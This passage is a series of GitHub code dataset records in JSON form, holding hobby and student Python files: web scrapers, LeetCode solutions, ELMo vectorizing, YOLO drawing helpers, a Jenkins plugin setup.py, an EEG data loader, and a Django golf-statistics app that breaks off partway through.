tr('td')\n ulist.append([tds[0].string.replace('\\n','').replace(' ',''),tds[1].text.replace('\\n','').replace(' ',''),tds[4].string.replace('\\n','').replace(' ','')])\n return ulist\n\ndef printUnivlist(ulist,num):\n tpl = '{0:^10}\\t{1:{3}^15}\\t{2:^10}'\n print(tpl.format('排名','学校名称','总分',chr(12288)))\n for i in range(num):\n u = ulist[i]\n print(tpl.format(u[0],u[1],u[2],chr(12288)))\n\n# def save_to_excel(ulist):\n# wb = openpyxl.Workbook()\n# ws = wb.active\n# ws['A1'] = '排名'\n# ws['B1'] = '学校名称'\n# ws['C1'] = '总分'\n# for u in ulist:\n# ws.append(u)\n# wb.save('C:\\\\Users\\\\陌离\\\\Desktop\\\\中国大学排名.xlsx')\n\ndef main():\n url = 'http://www.shanghairanking.cn/rankings/bcur/2020'\n soup = getHTMLText(url)\n ulist = fillUnivlist(soup)\n printUnivlist(ulist,567)\n # save_to_excel(ulist)\n\nif __name__ == '__main__':\n main()","repo_name":"1552845373/Python","sub_path":"爬虫/university rank.py","file_name":"university rank.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19946057521","text":"from elmo.elmoformanylangs import Embedder\nimport pandas as pd\nimport numpy as np\n\nfrom sklearn.decomposition import TruncatedSVD\n\nco = pd.read_pickle('/home/mluser/master8_projects/clustering_vacancies/data/corpus/df_vacancies_full_ru_42K.pkl')\ndocuments = np.array(co.preprocessed_text)\n\nembedder = Embedder('elmo/model/')\n\nvectors = embedder.sents2elmo(documents)\n\nnew_vectors = []\nfor vector in vectors:\n new_vectors.append(vector.mean(0))\n\nvectors = np.array(new_vectors)\n\nsvd = TruncatedSVD(n_components=300).fit(vectors)\nvectors = svd.transform(vectors)\n\nco['elmo_300'] = vectors.tolist()\nco = co[['id', 'is_prog', 'is_test', 'is_train', 'label_true', 'elmo_300']]\n\nco.to_pickle('/home/mluser/master8_projects/clustering_vacancies/data/corpus/df_vacancies_full_ru_42K_elmo.pkl')","repo_name":"omega1996/vacancy_clustering","sub_path":"scripts/vectorizing_elmo.py","file_name":"vectorizing_elmo.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19667010376","text":"# Method 1: Recursion + memoisation\n# Time : O(n^4) = TLE\n\n# Logic: for forming the target[0] (i.e 1st char in remaining target)\n# we can use any of the char from all words from the next possible index(last index we used for target formation)\n\nclass Solution:\n def numWays(self, words: List[str], target: str) -> int:\n n = len(words[0]) # all of same length\n mod = 10**9 + 7\n\n @lru_cache(None)\n def solve(target , ind):\n if not target:\n return 1\n if ind >= n:\n return 0\n ans = 0\n for word in words:\n for k in range(ind, n):\n if target[0] == word[k]:\n ans += solve(target[1: ], k + 1)\n return ans % mod\n\n return solve(target , 0) # [target, possibleIndexToChoose]\n \n\n# How we can optimise this?\n# Observe: \"Once you use the kth character of the jth string of words, \n# you can no longer use the xth character of any string in words where x <= k. \n# In other words, all characters to the left of or at index k become unusuable for every string\".\n\n# From since we are not allowed to move backward ,why to move to same index in any of the other word?\n# For each index 'i' in words, we can store the no of possible ways to get target[j].\n\n# Note: length of 'target' can't be greater than len(words[0]).\n\n# See the code for more.\n# Time: O(n^2) , space : O(n^2) + O(m*26), m = len(words[0])\n\nclass Solution:\n def numWays(self, words: List[str], target: str) -> int:\n # storing the count of each char at each index including all words in dictionary.\n # for this we need a dictionary or 2d array for m(len(words[0])).\n m , n = len(words[0]), len(target)\n countCharAtIndex = [Counter() for i in range(m)] # will keep tarck of no of char 'c' at 'i'th index.\n # counter will directly give value = 0 if char is not present at that index considering all words.\n for word in words:\n for i, c in enumerate(word):\n countCharAtIndex[i][c] += 1 # At ith index count of 'c'.\n \n # Now for forming the target\n # we have 2 options:\n # 1) Don't include char of this index from any of the word so simply move to next function call (Not Take)\n # 2) Take the char at this index:\n # in this ans will depend on count of 'target[i]' i.e say 'n' including all words then ans = n * next function call\n # And last return sum of both\n\n mod = 10**9 + 7\n\n @lru_cache(None)\n def solve(i, j):\n if i == n:\n # found one of possible ways\n return 1\n if j == m:\n # Without getting target went out of array i.e no possible way\n return 0\n # choice 1: Not include char of cur index from any of the word\n ans = solve(i, j + 1) # have to search from index 'i' only\n # choice 2: if we consider the char at cur index from any of the word.\n c = target[i] # curChar\n ans += countCharAtIndex[j][c] * solve(i + 1 , j + 1) # have to search from index 'i + 1' only\n return ans % mod\n \n return solve(0 , 0) # [TargetIndex , wordIndex]\n\n\n","repo_name":"Ravi-0412/DSA-Program-And-Notes","sub_path":"Dynamic Programming/0_1_knapsack/1639. Number of Ways to Form a Target String Given a Dictionary.py","file_name":"1639. Number of Ways to Form a Target String Given a Dictionary.py","file_ext":"py","file_size_in_byte":3276,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"3"} +{"seq_id":"43179237730","text":"import sys\n\ninput = sys.stdin.readline\n\ndef YESorNo():\n n = int(input())\n phone_num = {input().rstrip() for i in range(n)}\n for num in phone_num:\n for j in range(1, len(num)):\n if num[0:j] in phone_num:\n return False\n return True\n\n\nt = int(input())\n\nfor TC in range(1, t+1):\n result = YESorNo()\n if result:\n print('YES')\n else:\n print('NO')","repo_name":"sondongmin0419/study","sub_path":"python/b_5052 전화번호 목록.py","file_name":"b_5052 전화번호 목록.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21314769780","text":"from urllib.request import urlopen\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nfrom requests.exceptions import ChunkedEncodingError\r\n\r\n\r\n# URL 정보\r\ndef get_page(no):\r\n url = f'http://kb.or.kr/p/index.php?j=41&ej_code=notice&st=100&sv=&pno=15&sort=0&page={no}'\r\n return url\r\n\r\n\r\n# URL 정보로 data 가져오기\r\ndef get_data(url):\r\n try:\r\n req = requests.get(url, stream=True)\r\n html = req.content\r\n soup = BeautifulSoup(html, 'html.parser')\r\n table = soup.find(id='ej-tbl')\r\n title = table.find_all('a')\r\n return title\r\n\r\n except ChunkedEncodingError:\r\n print('에러 발생')\r\n\r\n\r\n# def show_title(pdata, page_no):\r\n# BASE_URL = 'http://kb.or.kr/'\r\n# title = []\r\n# hrefs = []\r\n# page_dic = []\r\n# for i in pdata:\r\n\r\n\r\ndef main():\r\n for i in range(1, 24):\r\n page_data = get_data(get_page(i))\r\n for n in page_data:\r\n print(n.get_text())\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"hickee032/python","sub_path":"beautifulsoup(뷰티풀_수프)/BeautifulSoup_04.py","file_name":"BeautifulSoup_04.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22750611089","text":"#MyModule0315.py\n# Author: Yuichiro SUGA\n# Created: 2018-04-24\n# Email: dmq0039@mail4.doshisha.ac.jp\nimport random\n\ndef printEven(a):\n for ax in a:\n if ax % 2 == 0:\n print(ax)\n\n\ndef printNumber(N):\n num = 0\n total = 0\n while total < N:\n num = random.randint(0,10)\n total += num\n print(\"+{:>2d}:\".format(num), total)\n print(\"Total:\", total)\n","repo_name":"baccatore/Advanced-Lectures-in-Medical-Informatics","sub_path":"ch3/MyModule0315.py","file_name":"MyModule0315.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29756503577","text":"import tensorflow as tf\nimport numpy as np\nimport cv2\nfrom nms import *\n\nFLAGS = tf.app.flags.FLAGS\n\ndef draw_boxes(img, bboxes, classes, idx_to_txt):\n h, w, _ = img.shape\n for i, box in enumerate(bboxes):\n scale_img = [h, w, h, w]\n box = [int(a*b) for a,b in zip(box, scale_img)]\n draw_box(img, classes[i], idx_to_txt, box)\n\ndef draw_box(img, cls, idx_to_txt, box):\n hsv = np.array([[[int(cls/float(len(idx_to_txt))*255), 255, 255]]], dtype=np.uint8)\n bgr = cv2.cvtColor(hsv, cv2.COLOR_HSV2BGR)[0, 0, :]\n bgr = [int(i) for i in bgr]\n text = idx_to_txt[cls]\n cv2.rectangle(img, (box[1], box[0]), (box[3], box[2]), bgr, 2)\n cv2.putText(img, text, (box[1], box[0]), cv2.FONT_HERSHEY_SIMPLEX, 1, bgr)\n\ndef parse_names(filename):\n f = open(filename, 'r')\n dic = {}\n for idx, line in enumerate(f):\n dic[idx] = line.strip()\n return dic\n\ndef preprocess_image(img):\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n img = cv2.resize(img, (416, 416))\n img = np.expand_dims(img, 0)\n img = img / 255.0\n return img\n","repo_name":"jkschin/YOLO","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19680247862","text":"import os\nfrom setuptools import setup,find_packages\n\n# Utility function to read the README file.\n# Used for the long_description. It's nice, because now 1) we have a top level\n# README file and 2) it's easier to type in the README file than to put a raw\n# string in below ...\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\nsetup(\n name = \"jenkins-buddy\",\n version = \"0.0.5\",\n author = \"Larry Cai\",\n author_email = \"larry.cai@gmail.com\",\n description = (\"Jenkins buddy to create jenkins easily, require jenkins-job-builder\"),\n license = \"OSI\",\n keywords = \"jenkins, plugin\",\n url = \"http://github.com/larrycai/jenkins-buddy\",\n packages=find_packages(), \n long_description=read('README.md'),\n install_requires=[\"jenkins-job-builder>=0.6.0\"],\n classifiers=[\n 'Environment :: Console',\n 'Intended Audience :: Developers',\n 'Intended Audience :: Information Technology',\n 'License :: OSI Approved :: Apache Software License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python'\n ],\n entry_points={\n 'console_scripts': [\n 'jenkins-buddy=jenkins_buddy.cmd:main', # this will be added for more\n ],\n 'jenkins_jobs.publishers': [\n 'artifactdeployer=jenkins_buddy.modules.publishers:artifactdeployer',\n ],\n }\n)\n","repo_name":"larrycai/jenkins-buddy","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"36065546184","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import interpolate\n\ndef load_data_files(num_samples: int, name: str, shape: str = \"1d\", num_dipoles: int = 1):\n \"\"\"\n Name is either \"dipole_area\", \"dipoles_w_amplitudes\" or \"simple_dipole\"\n Shape is either \"1d\", \"2d\" or \"interpolated\"\n \"\"\"\n valid_names = ['dipole_area', 'dipoles_w_amplitudes', 'simple_dipole']\n valid_shapes = ['1d', '2d', 'interpolated']\n if not name in valid_names:\n raise ValueError(f'name must be one of {valid_names}, not {name}')\n if not shape in valid_shapes:\n raise ValueError(f'shape must be one of {valid_shapes}, not {shape}')\n\n try:\n eeg = np.load(f'data/train_test_{name}_eeg_70000_{num_dipoles}.npy')\n pos_list = np.load(f'data/train_test_{name}_locations_70000_{num_dipoles}.npy')\n\n # eeg = np.load(f'data/train_test_const_A_{name}_const_A_eeg_70000_{num_dipoles}.npy')\n # pos_list = np.load(f'data/train_test_const_A_{name}_const_A_locations_70000_{num_dipoles}.npy')\n\n except FileNotFoundError as e:\n print(f'The eeg data you seek (num_samples = {num_samples}, name = {name}, shape = {shape}) has not yet been produced.')\n raise e\n\n # Necessary in case of CNN\n if shape == \"interpolated\":\n print(f'You are now interpolating the EEG data with {num_dipoles} dipoles')\n eeg = return_interpolated_eeg_data(eeg, num_samples)\n elif shape == \"2d\":\n eeg = return_2d_eeg_data(eeg, num_samples)\n\n return eeg, pos_list\n","repo_name":"kamillasulebakk/DiLoc","sub_path":"Finals/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"74823770322","text":"from random import randint\n\nfrom Hunter_Summons_warlock import Warlock\nfrom Rogue_Paladin import Rogue, Paladin\nfrom Shaman_Druid_Priest import Druid, Priest\nfrom Warrior_Mage import Warrior, Mage\n\nfrom Pvp_all import Pvp_all\n\nwords = {\n 1: \"Да будет Бой! Что же у нас по героям?\",\n 2: \"Выбирайте персонажей на величайшую битв��!\",\n 3: 'Ну, да начнется бой!',\n 4: 'Это будет схваткой тысячелетия!'\n}\nunits = {\n 1: Warrior,\n 2: Mage,\n 3: Rogue,\n 4: Paladin,\n # 5: Hunter,\n 6: Warlock,\n # 7: Shaman,\n 8: Druid,\n 9: Priest\n\n}\nchoice_end = True\nwhile choice_end:\n print(\"Приветствую тебя, странник! Если желаешь сыграть в пвп, жми 1, если против мобов - 2.\")\n choice1 = int(input())\n if choice1 == 1:\n print(words[randint(1, 4)])\n Pvp_all(list(map(int, input('Введите количество человек в каждой команде: ').split())))\n elif choice1 == 2:\n pass\n else:\n print('Incorrect choice')\n if int(input('if you want to close\\end press 0: ')) == 0:\n choice_end = False\nprint('Bye!')\n","repo_name":"Tmi-creator/project-oleg2","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25071655989","text":"from django.views import generic\nfrom .models import Person, Stat\nfrom django.db.models import Q\nfrom django.shortcuts import get_object_or_404\nfrom django.urls import reverse_lazy\nfrom .forms import StatCreateForm, PersonCreateForm, CSVUploadForm\nimport pandas as pd\nfrom . import plugin_plotly\nfrom django.core.paginator import Paginator\nfrom .forms import PersonCreateForm\nfrom django.db.models import Avg\nfrom django.shortcuts import redirect\nimport csv\nimport io\nfrom django.contrib import messages\nfrom sklearn.linear_model import LinearRegression\nimport numpy as np\nfrom django.http import HttpResponse\nimport csv,urllib\nimport chardet\n\n#プレイヤー一覧ページ\nclass PersonList(generic.ListView):\n model = Person\n template_name = \"score/index.html\"\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n #プレイヤー未登録の場合メッセージを表示する\n login_user_id = self.request.user.id\n person_user = Person.objects.values_list('login_user', flat=True).filter(login_user=login_user_id)\n if person_user.exists() == False:\n context[\"player_add\"] = \"プレイヤーを追加してください\" \n\n #ページネーション\n person_list = Person.objects.filter(login_user=login_user_id)\n persons = Paginator(person_list, 10).get_page(self.request.GET.get('p'))\n\n context[\"persons\"] = persons\n\n return context\n\n#プレイヤー登録ページ\nclass PersonCreate(generic.CreateView):\n model = Person\n template_name = 'score/person_create.html'\n form_class = PersonCreateForm\n \n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['breadcrumbs_list'] = [{'name': 'プレイヤー追加',\n 'url': ''}]\n context[\"persons\"] = Person.objects.all()\n #setting.pyで設定したSEXから選択\n context[\"sexs\"] = [ p[0] for p in Person.sex.field.choices ]\n\n return context\n\n def form_valid(self, form):\n post = form.save(commit=False)\n post.login_user = self.request.user.id\n post.save()\n\n return super().form_valid(form)\n \n\n def get_success_url(self):\n pk = self.request.user.id\n\n return reverse_lazy(\"score:person_list\")\n \n#スタッツ一覧とスタット登録ページ\nclass StatCreate(generic.CreateView):\n template_name = \"score/detail.html\"\n ordering = ('date')\n form_class = StatCreateForm\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n pk = self.kwargs.get(\"pk\")\n \n #スコア未登録の場合メッセージを表示\n stats = Stat.objects.filter(player=pk)\n stats_str = f'{stats}'\n context[\"check\"] = any(map(str.isdigit, stats_str))\n\n context[\"person\"] = get_object_or_404(Person, pk=pk)\n context['breadcrumbs_list'] = [{'name': 'Stats',\n 'url': ''}]\n context[\"stat_p\"] = Paginator(stats, 10).get_page(self.request.GET.get('p'))\n\n #Stat平均\n #Statテーブルが空の場合はエラーになるため\n if Stat.objects.filter(player=pk).all().exists() == True:\n\n score_avg = Stat.objects.filter(player=pk).aggregate(Avg(\"total_score\"))\n score_avg = f'{score_avg}'\n context[\"score_avg\"] = round(float(score_avg.replace(\"{'total_score__avg': \", \"\").replace(\"}\", \"\")),1)\n\n putt_avg = Stat.objects.filter(player=pk).aggregate(Avg(\"putt\"))\n putt_avg = f'{putt_avg}'\n context[\"putt_avg\"] = round(float(putt_avg.replace(\"{'putt__avg': \", \"\").replace(\"}\", \"\")), 1)\n\n fw_avg = Stat.objects.filter(player=pk).aggregate(Avg(\"fw\"))\n fw_avg = f'{fw_avg}'\n context[\"fw_avg\"] = round(float(fw_avg.replace(\"{'fw__avg': \", \"\").replace(\"}\", \"\")), 1)\n\n par_on_avg = Stat.objects.filter(player=pk).aggregate(Avg(\"par_on\"))\n par_on_avg = f'{par_on_avg}'\n context[\"par_on_avg\"] = round(float(par_on_avg.replace(\"{'par_on__avg': \", \"\").replace(\"}\", \"\")), 1)\n\n ob_avg = Stat.objects.filter(player=pk).aggregate(Avg(\"ob\"))\n ob_avg = f'{ob_avg}'\n context[\"ob_avg\"] = round(float(ob_avg.replace(\"{'ob__avg': \", \"\").replace(\"}\", \"\")), 1)\n\n bunker_avg = Stat.objects.filter(player=pk).aggregate(Avg(\"bunker\"))\n bunker_avg = f'{bunker_avg}'\n context[\"bunker_avg\"] = round(float(bunker_avg.replace(\"{'bunker__avg': \", \"\").replace(\"}\", \"\")), 1)\n\n penalty_avg = Stat.objects.filter(player=pk).aggregate(Avg(\"penalty\"))\n penalty_avg = f'{penalty_avg}'\n context[\"penalty_avg\"] = round(float(penalty_avg.replace(\"{'penalty__avg': \", \"\").replace(\"}\", \"\")), 1)\n\n return context\n\n def form_valid(self, form):\n post = form.save(commit=False)\n post.player_id = self.kwargs.get(\"pk\")\n post.save()\n\n return super().form_valid(form)\n\n def get_success_url(self):\n pk = self.kwargs.get(\"pk\")\n\n return reverse_lazy(\"score:detail\", kwargs={\"pk\": pk})\n\n#スタッツ分析ページ\nclass StatAnalyze(generic.DetailView):\n model = Person\n template_name = \"score/stat_analyze.html\"\n \n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n pk = self.kwargs.get(\"pk\")\n\n context['breadcrumbs_list'] = [\n {'name': 'Stats', 'url': f'/score/detail/{pk}/'},\n {'name': '分析結果','url': ''}\n ]\n\n #Statテーブルをデータフレーム化\n df = pd.DataFrame(Stat.objects.filter(player_id=pk).values())\n df.columns = [\"id\", \"player_id\", \"date\", \"スコア\", \"パット\", \"FWキープ\", \"パーオン\", \"OB\", \"バンカー\", \"ペナルティ\", \"stat_number\"]\n\n #データ数が7以下だとLinearRegressionがエラーになるでの場合分け\n if len(df) > 7:\n #全stat\n z = df.drop(['id','player_id','date','stat_number'], axis=1)\n\n #一項目が全て同じ値だとエラーになるのでその場合値を変える\n score_count = len(z)-1\n putt_true_count = f'{z.duplicated(\"パット\")}'.count(\"True\")\n if putt_true_count == score_count:\n z.iat[1,1] = 101\n\n fw_true_count = f'{z.duplicated(\"FWキープ\")}'.count(\"True\")\n if fw_true_count == score_count:\n z.iat[1,2] = 101\n\n par_true_count = f'{z.duplicated(\"パーオン\")}'.count(\"True\")\n if par_true_count == score_count:\n z.iat[1,3] = 101\n \n ob_true_count = f'{z.duplicated(\"OB\")}'.count(\"True\")\n if ob_true_count == score_count:\n z.iat[1,4] = 101\n\n bunker_true_count = f'{z.duplicated(\"バンカー\")}'.count(\"True\")\n if bunker_true_count == score_count:\n z.iat[1,5] = 101\n\n penalty_true_count = f'{z.duplicated(\"ペナルティ\")}'.count(\"True\")\n if penalty_true_count == score_count:\n z.iat[1,6] = 101 \n\n #statを標準化\n df_std = z.apply(lambda x: (x-x.mean())/x.std(), axis=0)\n x = df_std.drop(['スコア'], axis=1)\n y = df_std['スコア']\n\n reg = LinearRegression()\n results = reg.fit(x,y)\n coef = reg.coef_.round(4)\n n = x.shape[0]\n p = x.shape[1]\n y_hat = reg.predict(x)\n sse = np.sum((y - y_hat) **2, axis=0)\n sse = sse / (n - p - 1)\n s = np.linalg.inv(np.dot(x.T, x))\n std_err = np.sqrt(np.diagonal(sse * s)).round(4)\n\n t_values = (coef / std_err).round(4)\n t_values_abs = np.abs(t_values)\n col = [\"パット\", \"FWキープ\", \"パーオン\", \"OB\", \"バンカー\", \"ペナルティ\"]\n t_col = dict(zip(col, t_values_abs))\n practice = sorted(t_col.items(), key=lambda x:x[1], reverse=True)\n \n #データ数が7以下の場合\n else:\n #スコア数カウント\n df_score = df.sort_values(\"スコア\")\n data_count = df[\"スコア\"].count()\n \n #各ラウンドのパット数が全ラウンド中何位かと、その時のスコアが全ラウンド中何位かを出し、その差を合計。その値が小さければよりパット数がスコアに影響しているということ。\n df_patt = df.sort_values(by=[\"パット\",\"スコア\"])\n patt_count = [abs(df_patt.index.get_loc(i) - df_score.index.get_loc(i)) for i in range(data_count)]\n patt_score = sum(patt_count)\n \n df_fk = df.sort_values(by=[\"FWキープ\",\"スコア\"], ascending=[False,True])\n fk_count = [abs(df_fk.index.get_loc(i) - df_score.index.get_loc(i)) for i in range(data_count)]\n fk_score = sum(fk_count)\n \n df_po = df.sort_values(by=[\"パーオン\",\"スコア\"], ascending=[False,True])\n po_count = [abs(df_po.index.get_loc(i) - df_score.index.get_loc(i)) for i in range(data_count)]\n po_score = sum(po_count)\n \n df_OB = df.sort_values(by=[\"OB\",\"スコア\"])\n OB_count = [abs(df_OB.index.get_loc(i) - df_score.index.get_loc(i)) for i in range(data_count)]\n OB_score = sum(OB_count)\n\n df_bunker = df.sort_values(by=[\"バンカー\",\"スコア\"])\n bunker_count = [abs(df_bunker.index.get_loc(i) - df_score.index.get_loc(i)) for i in range(data_count)]\n bunker_score = sum(bunker_count)\n \n df_pn = df.sort_values(by=[\"ペナルティ\",\"スコア\"])\n pn_count = [abs(df_pn.index.get_loc(i) - df_score.index.get_loc(i)) for i in range(data_count)]\n pn_score = sum(pn_count)\n\n #影響度を%で出したいので、逆数を取り%に直す。\n calc_add = 1/(OB_score+1) + 1/(pn_score+1) + 1/(fk_score+1) + 1/(po_score+1) + 1/(patt_score+1) + 1/(bunker_score+1)\n cf = 100 / calc_add\n\n result = {\"パット\": round(cf / (patt_score+1),1), \n \"FWキープ\": round(cf / (fk_score+1), 1), \n \"パーオン\": round(cf / (po_score+1), 1), \n \"OB\": round(cf / (OB_score+1), 1), \n \"バンカー\": round(cf / (bunker_score+1),1), \n \"ペナルティ\": round(cf / (pn_score+1), 1)}\n\n practice = sorted(result.items(), key=lambda i: i[1], reverse=True)\n \n result = practice[0][0],practice[1][0],practice[2][0],practice[3][0],practice[4][0],practice[5][0]\n result_a = f'{result}'.translate(str.maketrans({\"(\": \"\", \")\": \"\", \"'\": \"\"}))\n context[\"result_a\"] = result_a \n\n #円グラフ用\n number = practice[0][1],practice[1][1],practice[2][1],practice[3][1],practice[4][1],practice[5][1]\n context[\"chart\"] = plugin_plotly.Plot_PieChart([pie for pie in number], [label for label in result])\n\n return context\n\n#スタッツ削除\nclass StatDelete(generic.DeleteView):\n model = Stat\n template_name = 'score/person_create.html'\n def get_success_url(self):\n player_pk = self.object.player.pk\n return reverse_lazy('score:detail', kwargs={'pk': player_pk})\n\n#プレイヤー削除\nclass PersonDelete(generic.DeleteView):\n model = Person\n\n def get_success_url(self):\n return reverse_lazy('score:person_list')\n\n#カテゴリ別平均ページ\nclass Average(generic.ListView):\n model = Stat\n template_name = \"score/average.html\"\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n df_male = pd.DataFrame(Stat.objects.filter(player__sex=\"男性\").values())\n df_female = pd.DataFrame(Stat.objects.filter(player__sex=\"女性\").values())\n\n if Stat.objects.filter(player__sex=\"男性\").values().exists() == True:\n\n #男性平均\n male_score_avgs = round(df_male[[\"player_id\",\"total_score\"]].groupby(\"player_id\").mean()[\"total_score\"].mean(), 1)\n male_putt_avgs = round(df_male[[\"player_id\",\"putt\"]].groupby(\"player_id\").mean()[\"putt\"].mean(), 1)\n male_fw_avgs = round(df_male[[\"player_id\",\"fw\"]].groupby(\"player_id\").mean()[\"fw\"].mean(), 1)\n male_par_on_avgs = round(df_male[[\"player_id\",\"par_on\"]].groupby(\"player_id\").mean()[\"par_on\"].mean(), 1)\n male_ob_avgs = round(df_male[[\"player_id\",\"ob\"]].groupby(\"player_id\").mean()[\"ob\"].mean(), 1)\n male_bunker_avgs = round(df_male[[\"player_id\",\"bunker\"]].groupby(\"player_id\").mean()[\"bunker\"].mean(), 1)\n male_penalty_avgs = round(df_male[[\"player_id\",\"penalty\"]].groupby(\"player_id\").mean()[\"penalty\"].mean(), 1)\n\n #男それぞれの平均\n allmale_score_avg = df_male[[\"player_id\",\"total_score\",\"ob\",\"penalty\",\"fw\",\"par_on\",\"putt\", \"bunker\"]].groupby(\"player_id\").mean()\n male_60 = allmale_score_avg[allmale_score_avg[\"total_score\"] < 70]\n male_70 = allmale_score_avg[(allmale_score_avg[\"total_score\"] >= 70) & (allmale_score_avg[\"total_score\"] < 80)]\n male_80 = allmale_score_avg[(allmale_score_avg[\"total_score\"] >= 80) & (allmale_score_avg[\"total_score\"] < 90)]\n male_90 = allmale_score_avg[(allmale_score_avg[\"total_score\"] >= 90) & (allmale_score_avg[\"total_score\"] < 100)]\n male_100 = allmale_score_avg[(allmale_score_avg[\"total_score\"] >= 100) & (allmale_score_avg[\"total_score\"] < 110)]\n male_110 = allmale_score_avg[(allmale_score_avg[\"total_score\"] >= 110) & (allmale_score_avg[\"total_score\"] < 120)]\n male_120 = allmale_score_avg[allmale_score_avg[\"total_score\"] >= 120]\n\n #男性60平均\n male_score_60 = round(male_60.mean()[\"total_score\"], 1)\n male_putt_60 = round(male_60.mean()[\"putt\"], 1)\n male_fw_60 = round(male_60.mean()[\"fw\"], 1)\n male_par_on_60 = round(male_60.mean()[\"par_on\"], 1)\n male_ob_60 = round(male_60.mean()[\"ob\"], 1)\n male_bunker_60 = round(male_60.mean()[\"bunker\"], 1)\n male_penalty_60 = round(male_60.mean()[\"penalty\"], 1)\n\n #男性70平均\n male_score_70 = round(male_70.mean()[\"total_score\"], 1)\n male_putt_70 = round(male_70.mean()[\"putt\"], 1)\n male_fw_70 = round(male_70.mean()[\"fw\"], 1)\n male_par_on_70 = round(male_70.mean()[\"par_on\"], 1)\n male_ob_70 = round(male_70.mean()[\"ob\"], 1)\n male_bunker_70 = round(male_70.mean()[\"bunker\"], 1)\n male_penalty_70 = round(male_70.mean()[\"penalty\"], 1)\n\n #男性80平均\n male_score_80 = round(male_80.mean()[\"total_score\"], 1)\n male_putt_80 = round(male_80.mean()[\"putt\"], 1)\n male_fw_80 = round(male_80.mean()[\"fw\"], 1)\n male_par_on_80 = round(male_80.mean()[\"par_on\"], 1)\n male_ob_80 = round(male_80.mean()[\"ob\"], 1)\n male_bunker_80 = round(male_80.mean()[\"bunker\"], 1)\n male_penalty_80 = round(male_80.mean()[\"penalty\"], 1)\n \n #男性90平均\n male_score_90 = round(male_90.mean()[\"total_score\"], 1)\n male_putt_90 = round(male_90.mean()[\"putt\"], 1)\n male_fw_90 = round(male_90.mean()[\"fw\"], 1)\n male_par_on_90 = round(male_90.mean()[\"par_on\"], 1)\n male_ob_90 = round(male_90.mean()[\"ob\"], 1)\n male_bunker_90 = round(male_90.mean()[\"bunker\"], 1)\n male_penalty_90 = round(male_90.mean()[\"penalty\"], 1)\n\n #男性100平均\n male_score_100 = round(male_100.mean()[\"total_score\"], 1)\n male_putt_100 = round(male_100.mean()[\"putt\"], 1)\n male_fw_100 = round(male_100.mean()[\"fw\"], 1)\n male_par_on_100 = round(male_100.mean()[\"par_on\"], 1)\n male_ob_100 = round(male_100.mean()[\"ob\"], 1)\n male_bunker_100 = round(male_100.mean()[\"bunker\"], 1)\n male_penalty_100 = round(male_100.mean()[\"penalty\"], 1)\n\n #男性110平均\n male_score_110 = round(male_110.mean()[\"total_score\"], 1)\n male_putt_110 = round(male_110.mean()[\"putt\"], 1)\n male_fw_110 = round(male_110.mean()[\"fw\"], 1)\n male_par_on_110 = round(male_110.mean()[\"par_on\"], 1)\n male_ob_110 = round(male_110.mean()[\"ob\"], 1)\n male_bunker_110 = round(male_110.mean()[\"bunker\"], 1)\n male_penalty_110 = round(male_110.mean()[\"penalty\"], 1)\n\n #男性120平均\n male_score_120 = round(male_120.mean()[\"total_score\"], 1)\n male_putt_120 = round(male_120.mean()[\"putt\"], 1)\n male_fw_120 = round(male_120.mean()[\"fw\"], 1)\n male_par_on_120 = round(male_120.mean()[\"par_on\"], 1)\n male_ob_120 = round(male_120.mean()[\"ob\"], 1)\n male_bunker_120 = round(male_120.mean()[\"bunker\"], 1)\n male_penalty_120 = round(male_120.mean()[\"penalty\"], 1)\n\n\n #男性平均cxt\n if f'{male_score_avgs}' != \"nan\":\n context[\"male_score_avgs\"] = f'{male_score_avgs}'\n context[\"male_putt_avgs\"] = f'{male_putt_avgs}'\n context[\"male_fw_avgs\"] = f'{male_fw_avgs}'+\"%\"\n context[\"male_par_on_avgs\"] = f'{male_par_on_avgs}'+\"%\"\n context[\"male_ob_avgs\"] = f'{male_ob_avgs}'+\"回\"\n context[\"male_bunker_avgs\"] = f'{male_bunker_avgs}'+\"回\"\n context[\"male_penalty_avgs\"] = f'{male_penalty_avgs}'+\"回\"\n \n #男性60平均cxtf'{}'+\"\"\n if f'{male_score_60}' != \"nan\":\n context[\"male_score_60\"] = male_score_60\n context[\"male_putt_60\"] = f'{male_putt_60}'\n context[\"male_fw_60\"] = f'{male_fw_60}'+\"%\"\n context[\"male_par_on_60\"] = f'{male_par_on_60}'+\"%\"\n context[\"male_ob_60\"] = 